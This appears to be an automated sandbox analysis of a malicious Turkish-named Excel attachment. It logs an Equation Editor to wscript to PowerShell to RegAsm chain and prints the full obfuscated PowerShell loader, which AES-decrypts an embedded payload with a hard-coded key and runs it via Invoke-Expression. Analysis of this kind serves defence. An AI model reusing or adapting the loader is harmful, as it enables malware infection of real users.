              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: #U00d6DEME TAVS#U0130YES#U0130.xlsStream path 'MBD000177E1/Package' entropy: 7.97199048762 (max. 8.0)
              Source: #U00d6DEME TAVS#U0130YES#U0130.xlsStream path 'Workbook' entropy: 7.99929650029 (max. 8.0)
              Source: ~DFB88BC22996138750.TMP.0.drStream path 'Package' entropy: 7.96718436442 (max. 8.0)
              Source: F0630000.0.drStream path 'MBD000177E1/Package' entropy: 7.96718436442 (max. 8.0)
              Source: F0630000.0.drStream path 'Workbook' entropy: 7.99930766343 (max. 8.0)
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5693Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 863Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3268Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3484Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3488Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3488Thread sleep time: -2400000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3488Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3412Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTR
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplebeautygirlfrndhaveform.vBS" Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53245645968011423739588623973337CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIIfj5tD9O95CJERD65QS8cgd6mKhDFXu5KnhuNUHV8eN0Bizzo6XYsPUOr/naNJ9+K8DnwkvsZljh8/jDtCBlcE7JwBlipBYNS69FMVrYo8riAT/OCm+86aVfem+jS7xh93ssL6airSk1E4+mG3y/ys93bKWl7qe/OiIfd0sR1FM9xZhEYuwuHy/AU8FfHXTeSMPl/YzZJ+ERHVh+bArXV063XruUdd/cZK/At2Cd+nbGZfGFDj29bcydLi2HTao5Px2joIFcvB02gojNaG2SWau3s/c6HFNqHbJGGUvRutXMletl29tNTCgqa0tUwol3eukX7WxBG0I6W0I89mN4k+5nR4K2AK8APbfVOX2Kvv5Tano47cej4QtGlf3mt0SPlqwZ9JReU64MQQKkvdzo84oqAoQ+HKZ5+76sSvuVPLVPNwT4waP3/VLkFCFvdaX6peTauqLmO7Enf3jzdxLsVBi7+NpZvpR8FLnBqiZzlImiogkvR17bPAS5CpYJnW/spi74gNlfkH3Qds0UlhmZe/la2ja5Mjup7w5KWxVsHB7OS7tLShSyN7PC/qbynVi6PhL80r558jq+Epf/Jw5jd2cMqIeQ4mv2U7EHxT/brTG1G9P22Aeim3ofkuv8Q/SbtoTP/20JvRjQ8WJRpM/rpy0QrrdKIDxmHOj8D6rmtRQVNLhZ+QU80DQhyY621X7HrHP/CHEzyeyQZWYMrUUzD7owZM8RgeUNb1tZcnVUx5eYVO7nU46ipcNFuuOEq7bDkKPW3S8iF+x6isuilkSnxQGLGoiQ/3UQx1KT5knk+IGE6RsunZht35yevyQ39siNJMcED7UWj/p5RW4pseMzZxQl/ER7KgeB/ga2lAverkwIuezrF3ODu4Fwu5pnQAqjKIbiK2WSd3HqQ6ElDbZDPlYJnIiorFFgTexsUy6Oe4ME8KrjwDHFPmrWUYgSixHjBrs984Mgz6L5vb7M2/1oZiU1cR0qRdZy3k3VSR+EnkjMt7QgpSt+TbAem6N1XrXX9yzuPZHT3jK7lS4aHtIloD1MMXWuIFungQbKc9KeITySZskxIxzuGSwplqK0ziNU0ELPRdi1QwF3PH5FGpGbNrOTsh2BXgal6KV70rLlImHCB/8N7+Zv4j3XQUvj7YpMsgavK4CpP2Kc0q2QBsv7EQwDeKTCM8Lho0uj59AXofd0v7Z0vxAotnN5Mo4LmIYSm7KuWnX/7BetKCLQsfM4MXEXF6te/5nneOgTKpDRxwFFl4mVtKv5tMtOpWM/IW/h9086XNQd1JCqFrA3dwaQ9H6+RTfGXHWBLLV/H2MbX+G3rK+Am8FjxJeLV3vZ/qwk0O2aTk8NsmzYZcdfcOP03B9h/iEr7Se0SP/S6mlR/0wuzt7CmAPKp/CNPz0fC/0tV0xJ8NlgvvQQvk1Zz/ZXQQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni53245645968011423739588623973337cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = 